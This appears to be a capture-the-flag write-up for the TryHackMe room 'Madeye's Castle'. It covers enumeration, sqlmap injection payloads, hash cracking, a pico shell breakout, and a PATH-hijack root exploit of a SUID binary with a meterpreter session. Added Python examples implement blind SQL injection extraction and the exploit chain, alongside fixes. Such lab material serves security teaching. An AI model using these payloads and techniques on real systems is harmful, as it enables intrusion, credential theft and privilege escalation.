- URL: https://tryhackme.com/room/madeyescastle
- Target OS: Linux
- Rated Difficulty: Medium
DESCRIPTION
Have fun storming Madeye’s Castle! In this room you will need to fully enumerate the system, gain a foothold, and then pivot around to a few different users.
ENUM >> NMAP
root@ip-10-10-188-149:~# nmap -sS -sV -oN madeye_init 10.10.136.197
Starting Nmap 7.60 ( https://nmap.org ) at 2021-12-12 05:27 GMT
Nmap scan report for ip-10-10-136-197.eu-west-1.compute.internal (10.10.136.197)
Host is up (0.013s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:C4:11:EB:67:87 (Unknown)
Service Info: Host: HOGWARTZ-CASTLE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.52 seconds
ENUM >> FeroxBuster (common.txt)
❯ feroxbuster -u http://10.10.136.197/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.4.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.136.197/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.4.0
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403 9l 28w 278c http://10.10.136.197/.hta
403 9l 28w 278c http://10.10.136.197/.htaccess
403 9l 28w 278c http://10.10.136.197/.htpasswd
301 9l 28w 315c http://10.10.136.197/backup
403 9l 28w 278c http://10.10.136.197/backup/.hta
403 9l 28w 278c http://10.10.136.197/backup/.htaccess
403 9l 28w 278c http://10.10.136.197/backup/.htpasswd
200 375l 969w 10965c http://10.10.136.197/index.html
200 43l 258w 1527c http://10.10.136.197/backup/email
403 9l 28w 278c http://10.10.136.197/server-status
[####################] - 33s 9404/9404 0s found:10 errors:0
[####################] - 28s 4702/4702 167/s http://10.10.136.197/
[####################] - 27s 4702/4702 172/s http://10.10.136.197/backup
ENUM >> /backup/email
- This looks to be a big hint pointing towards vhosts… we also saw HOGWARTZ-CASTLE (with a "z") mentioned in the Service Info line of the NMAP scan…
Madeye,
It is done. I registered the name you requested below but changed the "s" to a "z". You should be good to go.
RME
--------
On Tue, Nov 24, 2020 at 8:54 AM Madeye Moody <ctf@madeye.ninja> wrote:
Mr. Roar M. Echo,
Sounds great! Thanks, your mentorship is exactly what we need to avoid legal troubles with the Ministry of Magic.
Magically Yours,
madeye
--------
On Tue, Nov 24, 2020 at 8:53 AM Roar May Echo <info@roarmayecho.com> wrote:
Madeye,
I don't think we can do "hogwarts" due to copyright issues, but let's go with "hogwartz", how does that sound?
Roar
--------
On Tue, Nov 24, 2020 at 8:52 AM Madeye Moody <ctf@madeye.ninja> wrote:
Dear Mr. Echo,
Thanks so much for helping me develop my castle for TryHackMe. I think it would be great to register the domain name of "hogwarts-castle.thm" for the box. I have been reading about virtual hosting in Apache and it's a great way to host multiple domains on the same server. The docs says that...
> The term Virtual Host refers to the practice of running more than one web site (such as
> company1.example.com and company2.example.com) on a single machine. Virtual hosts can be
> "IP-based", meaning that you have a different IP address for every web site, or "name-based",
> meaning that you have multiple names running on each IP address. The fact that they are
> running on the same physical server is not apparent to the end user.
You can read more here: https://httpd.apache.org/docs/2.4/vhosts/index.html
What do you think?
Thanks,
madeye
- Sure enough! Adding an /etc/hosts entry that points the target IP at hogwartz-castle.thm reveals a login page when we visit http://hogwartz-castle.thm (the default vhost on the bare IP only serves the static index.html).
ENUM >> samba
- Running enum4linux against the box we get a few tidbits of information:
[+] Attempting to map shares on hogwartz-castle.thm
//hogwartz-castle.thm/sambashare Mapping: OK Listing: OK Writing: N/A
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\harry (Local User)
S-1-22-1-1002 Unix User\hermonine (Local User)
- First things first, let’s check out that share:
❯ smbclient \\\\10.10.136.197\\sambashare
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\stimpz]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 12:19:20 2020
.. D 0 Thu Nov 26 11:57:55 2020
spellnames.txt N 874 Thu Nov 26 12:06:32 2020
.notes.txt H 147 Thu Nov 26 12:19:19 2020
9219412 blocks of size 1024. 4394760 blocks available
smb: \> get spellnames.txt
getting file \spellnames.txt of size 874 as spellnames.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> get .notes.txt
getting file \.notes.txt of size 147 as .notes.txt (0.1 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
LOOT >> .notes.txt
Hagrid told me that spells names are not good since they will not "rock you"
Hermonine loves historical text editors along with reading old books.
ENUM >> SQLi!
While waiting for Hydra to brute-force the login form (dead-end) I tried a quick SQL injection on the user
field of the login page… this is the response I got!
{"error":"The password for Lucas Washington is incorrect! contact administrator. Congrats on SQL injection... keep digging"}
- Time to throw sqlmap at the login form (the request file is the captured POST to the login endpoint):
❯ sqlmap -r ~/tryhackme/ctf/madeyes_castle/requests --risk=3 --level=5 --random-agent --dump-all
___
__H__
___ ___[.]_____ ___ ___ {1.5.9#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[18:58:53] [INFO] POST parameter 'user' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --code=403)
[18:59:02] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'
[18:59:17] [INFO] POST parameter 'user' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests:
---
Parameter: user (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: user=-1478' OR 7741=7741-- QefG&password=password
Type: time-based blind
Title: SQLite > 2.0 OR time-based blind (heavy query)
Payload: user=harry' OR 1584=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- RCQw&password=password
---
[19:00:23] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: SQLite
[19:34:08] [INFO] retrieving the length of query output
[19:34:08] [INFO] retrieved: 1
[19:34:10] [INFO] retrieved: 0
[19:34:13] [INFO] retrieving the length of query output
[19:34:13] [INFO] retrieved: 12
[19:34:23] [INFO] retrieved: Harry Turner
[19:34:23] [INFO] retrieving the length of query output
[19:34:23] [INFO] retrieved: 60
[19:34:50] [INFO] retrieved: My linux username is my first name, and password uses best64
[19:34:50] [INFO] retrieving the length of query output
[19:34:50] [INFO] retrieved: 128
[19:35:47] [INFO] retrieved: <REDACTED>
CREDS - harry's website hash
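The following is an added example, not code from the room or from the writeup's author, showing what sqlmap is doing in the output above. It rebuilds the vulnerable pattern the login form evidently uses (the user field concatenated straight into a SQLite WHERE clause, which is why "' OR 1=1" logs in as the first row, Lucas Washington), then extracts a value one character at a time using nothing but the true/false difference between "password incorrect" and "unknown user", and finishes with the parameterised query that closes the hole. The table layout, the "Unknown user" response and the password placeholders are assumptions; only the names and the notes string come from the page.

```python
import hashlib
import sqlite3


def sha512_hex(s: str) -> str:
    return hashlib.sha512(s.encode()).hexdigest()


# Constructed sample rows: the names and the notes text mirror what the room's
# responses showed; the passwords are placeholders, not the box's real hashes.
SAMPLE_ROWS = [
    ("Lucas Washington", sha512_hex("placeholder-one"), "nothing to see here"),
    ("Harry Turner", sha512_hex("placeholder-two"),
     "My linux username is my first name, and password uses best64"),
]


def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, notes TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return db


def login_vulnerable(db: sqlite3.Connection, user: str, password: str) -> dict:
    """The bug: the user field is pasted into the query, so it can rewrite the WHERE clause."""
    query = f"SELECT name, password FROM users WHERE name = '{user}'"
    row = db.execute(query).fetchone()
    if row is None:
        return {"error": "Unknown user"}
    if row[1] != sha512_hex(password):
        return {"error": f"The password for {row[0]} is incorrect! contact administrator."}
    return {"ok": row[0]}


def login_fixed(db: sqlite3.Connection, user: str, password: str) -> dict:
    """Same logic with a bound parameter: the input is data, never SQL."""
    row = db.execute("SELECT name, password FROM users WHERE name = ?", (user,)).fetchone()
    if row is None:
        return {"error": "Unknown user"}
    if row[1] != sha512_hex(password):
        return {"error": f"The password for {row[0]} is incorrect! contact administrator."}
    return {"ok": row[0]}


def condition_true(db: sqlite3.Connection, cond: str) -> bool:
    """Boolean oracle: a true condition ORed onto the empty name match returns the
    first row (so we see 'incorrect'), a false one returns nothing ('Unknown user')."""
    reply = login_vulnerable(db, f"' OR ({cond})-- ", "x")
    return "incorrect" in reply.get("error", "")


def blind_extract(db: sqlite3.Connection, subquery: str, max_len: int = 256) -> str:
    """Recover the string value of `subquery` through the oracle alone: first its
    length, then a binary search over the code point of each position. This is
    the loop sqlmap's boolean-based blind mode automates ('retrieving the length
    of query output' followed by 'retrieved: ...')."""
    length = next(n for n in range(max_len + 1)
                  if condition_true(db, f"length(({subquery})) = {n}"))
    out = []
    for i in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII covers names, notes and hex hashes
        while lo < hi:
            mid = (lo + hi) // 2
            if condition_true(db, f"unicode(substr(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = build_db()
    print(login_vulnerable(db, "' OR 1=1-- ", "anything"))
    print(blind_extract(db, "SELECT notes FROM users WHERE name = 'Harry Turner'"))
    print(login_fixed(db, "' OR 1=1-- ", "anything"))
```

Each character costs about seven oracle requests, which is why sqlmap took half an hour to pull a 128-character hash over a slow link; the `LIMIT 1 OFFSET n` form of the subquery walks the table row by row without knowing any names in advance.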
PRIVESC >> harry’s password = SSH!
- Throwing the hash we found at john with that world-famous wordlist rockyou.txt and the best64 rule we get a hit! Both choices are hinted at: the samba note says spell names will not "rock you", and Harry's database row says his password "uses best64". The hash is 128 hex characters long, which is why --format=Raw-SHA512 is the right format.
❯ john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA512 --rules=best64 creds.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 128/128 AVX 2x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> (?)
1g 0:00:01:54 DONE (2021-12-12 20:17) 0.008737g/s 3388Kp/s 3388Kc/s 3388KC/s yaziel123..whoabuddy123
Session completed
CREDS - harry
- Hopefully harry is careless enough to use the same password on his shell account:
❯ ssh harry@hogwartz-castle.thm
harry@hogwartz-castle.thm's password:
(figlet-style welcome banner omitted)
Last login: Thu Nov 26 01:42:18 2020
harry@hogwartz-castle:~$
PRIVESC (lateral) >> hermonine
- Let's check out our sudo access since we have a password…
harry@hogwartz-castle:/home$ sudo -l
[sudo] password for harry:
Matching Defaults entries for harry on hogwartz-castle:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User harry may run the following commands on hogwartz-castle:
(hermonine) /usr/bin/pico
(hermonine) /usr/bin/pico
harry@hogwartz-castle:/home$ sudo -u hermonine /usr/bin/pico
- Good, pico is just nano under another name, so the standard editor breakout works: once it loads, hit Ctrl-R (Read File) and then Ctrl-X (Execute Command) to get a "Command to execute:" prompt. Typing reset; bash 1>&0 2>&0 there runs bash as hermonine with its stdout and stderr wired back to the terminal, and we break out into a shell:
hermonine@hogwartz-castle:/home$
PRIVESC >> root via SUID /srv/time-turner/swagger
- There is a binary named swagger installed in /srv/time-turner, a custom SUID binary that has 2 major flaws: it derives its "random" number (which you are expected to guess) from the current time, so two runs in the same second produce the same number, and it also conveniently calls uname without an absolute path, so it resolves the command through our PATH. The directory is writable, so we prepend it to PATH and then beat the guessing game with a pipeline: the first run is fed a wrong guess and prints the real answer, grep/cut pull the number out of that line, and it is piped straight into a second run before the second ticks over (a timing attack). The second run then executes whatever we have planted as uname, as root.
hermonine@hogwartz-castle:/srv/time-turner$ export PATH=/srv/time-turner:$PATH
hermonine@hogwartz-castle:/srv/time-turner$ echo '111' | /srv/time-turner/swagger | grep "of" | cut -f5 -d' ' | /srv/time-turner/swagger ;
- For the replacement uname I simply slipped in a meterpreter backdoor… all the usual "quick" methods would either lose the root privileges or fail for some other weird reasons (incorrect fd descriptors?!)…
[*] Meterpreter session 1 opened (10.4.54.194:4444 -> 10.10.116.144:49146) at 2021-12-12 22:12:12 +1100
meterpreter > getuid
Server username: root
meterpreter > ls
Listing: /srv/time-turner
=========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
104755/rwxr-xr-x 8816 fil 2020-11-26 12:06:32 +1100 swagger
100775/rwxrwxr-x 250 fil 2021-12-12 22:11:45 +1100 uname
meterpreter > cd /root
meterpreter > ls
Listing: /root
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
20666/rw-rw-rw- 0 cha 2021-12-12 18:35:51 +1100 .bash_history
100644/rw-r--r-- 3106 fil 2020-11-26 11:32:40 +1100 .bashrc
40700/rwx------ 4096 dir 2020-11-26 12:17:20 +1100 .cache
100640/rw-r----- 336 fil 2020-11-26 12:48:38 +1100 .credits.txt
40700/rwx------ 4096 dir 2020-11-26 12:17:20 +1100 .gnupg
100644/rw-r--r-- 148 fil 2020-11-26 11:32:40 +1100 .profile
40700/rwx------ 4096 dir 2020-11-26 12:44:11 +1100 .ssh
100600/rw------- 38 fil 2020-11-26 12:06:32 +1100 root.txt
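An added example, not code from the room or from the writeup's author, that models the two swagger flaws described above and the exploit chain against them in one runnable script. The binary's internals are an assumption here: it is modelled as a PRNG seeded with the current second followed by a bare `uname` lookup through PATH, and the reply wording is constructed (the page only tells us the real binary's answer appears after "of" on one line). The planted uname just announces itself instead of carrying a stager.

```python
import os
import random
import re
import shutil
import stat
import tempfile


def secret_for(second: int) -> int:
    """Assumed model of the binary's 'random' number: seeded from the clock, so
    every call within the same second yields the same value (stand-in for
    srand(time(NULL)); rand() % 100)."""
    return random.Random(second).randint(0, 99)


def swagger(guess: int, second: int, path_env: str) -> str:
    """Model of the SUID binary: check the guess, then call a bare `uname`.
    Because the name is not absolute it is resolved left to right through PATH,
    so a writable directory placed first in PATH decides which uname runs."""
    secret = secret_for(second)
    if guess != secret:
        return f"Wrong! The number I was thinking of was {secret}"
    return "Correct! uname resolves to " + (shutil.which("uname", path=path_env) or "<none>")


def parse_secret(reply: str) -> int:
    """The grep 'of' | cut -f5 -d' ' step from the writeup, for the constructed wording."""
    return int(re.search(r"of was (\d+)", reply).group(1))


def pipe_trick(second: int, path_env: str) -> str:
    """echo <wrong guess> | swagger | parse | swagger, both runs in the same second.
    -1 can never be the secret, so the first run always leaks the answer."""
    leaked = parse_secret(swagger(-1, second, path_env))
    return swagger(leaked, second, path_env)


def plant_fake_uname(directory: str) -> str:
    """Drop an executable named uname into the writable directory (the hijack)."""
    target = os.path.join(directory, "uname")
    with open(target, "w") as f:
        f.write("#!/bin/sh\necho hijacked\n")  # the page's real payload was a meterpreter stager
    os.chmod(target, os.stat(target).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return target


def hijacked_path(directory: str) -> str:
    """export PATH=<writable dir>:$PATH"""
    return directory + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")


def demo(second: int = 1700000000) -> dict:
    """Run the whole chain against a temporary stand-in for /srv/time-turner."""
    workdir = tempfile.mkdtemp(prefix="time-turner-")
    fake = plant_fake_uname(workdir)
    path_env = hijacked_path(workdir)
    return {
        "fake": fake,
        "resolved": shutil.which("uname", path=path_env),
        "reply": pipe_trick(second, path_env),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The defensive reading of the same model: a SUID program must call helpers by absolute path (or reset PATH itself) and must not take a "secret" from a source the caller can observe or predict. The pipeline on the box only works when both invocations land in the same second, which is why it is written as one command rather than two.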